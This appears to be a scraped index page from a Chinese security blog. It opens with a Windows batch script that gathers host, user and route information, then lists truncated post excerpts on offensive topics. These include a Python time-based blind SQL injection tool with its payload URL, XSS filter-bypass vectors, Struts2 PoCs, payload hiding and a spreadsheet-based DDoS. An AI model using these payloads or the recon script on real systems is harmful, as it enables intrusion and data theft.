@echo off echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo System Information >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt systeminfo | findstr /B /C:"OS" > System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo Hostname >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt hostname >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo Users>> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt net users >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt echo Route table >> System_Details.txt echo --------------------------------------------------------------------------------------------------- >> System_Details.txt route print >> System_Details.txt echo
某行车记录仪一年中拍到的各种惊险奇趣瞬间
视频: 某行车记录仪一年中拍到的各种惊险奇趣瞬间 关键词:瞬间,行车记录仪,一年中,拍到的,各种,惊险,奇趣,突然变道,高速路,马路杀手 某行车记
放弃那些无用的社交
那年我一个人来到北京,带上父亲跟我说的一句话:多交朋友。 于是,上大学时,我酷爱社交,参加了三个社团,只要有活动,都会去打个酱油。我乐意留别人
未来可能的安全焦点:GIS地理信息系统安全问题分析
引文:近几年,工控安全问题已经逐渐进入人们的视线中,与此同时,GIS安全问题或许会在未来成为一大安全焦点。本文将会简述GIS在地理学中的内容
python延迟注入
#!/usr/bin/env python # -*- coding: utf-8 -*- # 延迟注入工具 import urllib2 import time import socket import threading import requests class my_threading(threading.Thread): def __init__(self, str,x): threading.Thread.__init__(self) self.str = str self.x = x def run(self): global res x=self.x j = self.str url = "http://localhost/demo/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23" html = request(url) verify = 'timeout' if verify not in html: res[str(j)] = 0 #print 1
Payload隐藏技巧交流
整理一下payload隐藏的相关技巧,也想向大家学习一下更好的经验思路:) 0x00 目标: 维持对目标主机的控制权限 0x01 要求: 尽最大程度减少在目标win
利用 Appcache 和 ServiceWorker 进行持久型session hijacking 和 XSS
利用 Appcache 和 ServiceWorker 进行持久型session hijacking 和 XSS 小饼仔 | 2015-08-20 14:52 看了篇文章 Using Appcache and ServiceWorker for Evil,讲的是黑下服务器后,通过 Middlekit 技术,污染每个访问者的浏览器ca
系统运维工程师装逼完全指南
1、全球化的认证有助于提升逼格,什么OCM、CCIE、RHCA、CISSP等等能考都考,再不济,也要有一张系统架构设计师或者网络规划设计师的
物理黑客:使用空气清新剂喷雾触发传感器来打开“安全”门!
视频: 借用空气清新剂从外部打开基于PIR Motion Sensor的“安全”门 用喷雾触发传感器来打开“安全”门 只能说samy实在是太机智了。。 再附上两篇
这就是事故发生的原因……
我们自己的每一次“没做好人”,都像迎风吐痰,都是给世界设下的一个圈套,这个圈套也许大也许小,但最终很可能重新套回到我身上。因为社会本身就是一
MFFA:Android多媒体文件漏洞Fuzzing框架分析与测试
本文首发www.droidsec.cn | 安卓安全中文站 转载请注明出处 0x01.MFFA简介 MFFA(项目地址:https://github.
Struts2命令执行POC增强版
Struts2命令执行POC增强版 Wulala (^..^ ^..^ ^↓^ ^..^ ^..^) | 2015-08-04 13:06 Struts2命令执行的漏洞大家比我都了解, 网上公开的也有很多利用的POC. 带回显命
利用HTML5新特性之WebRTC进行拍照,可偷拍手机、电脑视频、照片
利用HTML5新特性之WebRTC进行(tou)拍(pai)照 jeary ((:?办么怎,了多越来越法方象抽的我)) | 2015-08-05 19:09 很早以前就知道html5可
北京NDS公司工程师攻击46万台机顶盒传播反动信息 获刑12年
8月3日,央视《焦点访谈》报道了一起黑客将反动信息通过技术手段直接植入用户机顶盒的网络安全案件,案件性质关系到国家安全。据报道,案件犯罪嫌疑
GSM Sniffer WEB 界面搭建测试
GSM Sniffer WEB界面搭建测试 三好学生 | 2015-07-29 12:00 0x00 前言 感谢一只猿、le4f提供资料,极大缩短学习时间。 初学GSM Sniffer,本文记录全部学习测试过程
Hacking Team Adobe Font Driver 提权 快速利用介绍
Hacking Team Adobe Font Driver 提权 快速利用介绍 三好学生 | 2015-07-15 11:22 0x00 目标 利用Hacking Team 的Adobe Font Driver内核漏洞代码,重新编译,获得系统权限。 0x01 测试环境
反黑逆向溯源追踪之:某某某局入侵事件分析
某某某局入侵事件分析 鬼魅羊羔 ((#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(
Hacking Team flash 0day 快速利用介绍
Hacking Team flash 0day 快速利用介绍 三好学生 | 2015-07-13 09:54 0x00 目标 利用Hacking Team 的flash 0day样本(CVE-2015-5119&CVE-2015-
无意中发现一个微软Windows系统自带命令“netsh”的狗血bug!
狗血的微软程序猿居然把“listenport”、“listenaddress”写错了,这是有多粗心…… 看图不解释…… 测试系统:Windows
网络安全法立法,网络安全法(草案)全文发布,并征求公众意见
2015年6月,第十二届全国人大常委会第十五次会议初次审议了《中华人民共和国网络安全法(草案)》。现将《中华人民共和国网络安全法(草案)》在
Unix 中不曾想过的的命令执行技巧
Unix 中不曾想过的的命令执行技巧,no one expect command execution。 不曾想过的的命令执行技巧 lxj616 (简介) | 2015-07-06 14:08 原文:http://0x90909090
【暴力快递调查】Arduino + 加速度传感器,24小时实时跟踪分析快递大叔
用Arduino来看看快递的暴力程度! 【暴力快递评测报告】想知道哪家快递大叔更暴力?Arduino科学“跟踪”调查告诉你! 作者:果壳实验室,
Jboss JMX/EJBInvokerServlet 批量检测工具
Jboss JMX/EJBInvokerServlet批量检测工具 ❤ (❤) | 2015-06-26 19:35 最近看茜茜公主刷了很多jboss的这个洞。 比如:WooYun: 腾付通某
OpenSSL心脏滴血漏洞另类玩法,持续监视目标数据,收集提取有价值信息
心脏滴血另类玩法-转自lijiejie 李旭敏 ((҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉҉) | 2015-06-28 00:19 本文转自lijiejie博客,觉得好
Bypassing Chrome’s Anti-XSS Filter,绕过谷歌浏览器 XSS 过滤器
Hi! Just wanted to share my finding. I’ve found a way to bypass Chrome’s anti-xss filter. This bypass is universal, and it defeats Chrome’s XSSAuditor in all cases! Description XSS attacks occur when one website injects JavaScript code into otherwise legitimate requests to another website. The injected script generally attempts to access privileged
浅谈代码中的重定向
浅谈代码中的重定向 he1renyagao (github.com/NaihTool) | 2015-06-21 16:40 今天,回顾下以前挖洞的思路,看到SSRF 这个问题,突然觉得利用302跳转来绕过这个点有点想法,于是自己测试了下。
从偶然的机会发现一个mysql特性到wooyun waf绕过题
从偶然的机会发现一个mysql特性到wooyun waf绕过题 MayIKissYou | 2015-06-19 12:00 最近在测试的时候,偶然的机会发现了一个mysql的特性, 为啥是偶然的机会
New IE mutation vector
I was messing around with a filter that didn’t correctly filter attribute names and allowed a blank one which enabled me to bypass it. I thought maybe IE had similar issues when rewriting innerHTML. Yes it does of course The filter bypass worked like this: <img ="><script>alert(1)</script>"> The filter incorrectly assumed it was still inside an attribute and therefore allowed raw html to be injected
物理安全之开锁技能,物理黑客开锁方法大全
物理安全之开锁技能 light (生于理想,死于欲望) | 2015-06-10 12:11 俗话说,不会开锁的黑客不是好厨师 我们经常在电影里看到这样的情节:帅气的light教授来到坏蛋
利用Google爬虫DDoS任意网站,利用Spreadsheet作为DDoS武器
只需要使用一台笔记本,打开几个web标签页,仅仅拷贝一些指向10MB文件的链接,Google去抓取同一文件的流量就超过了700Mbps。 提醒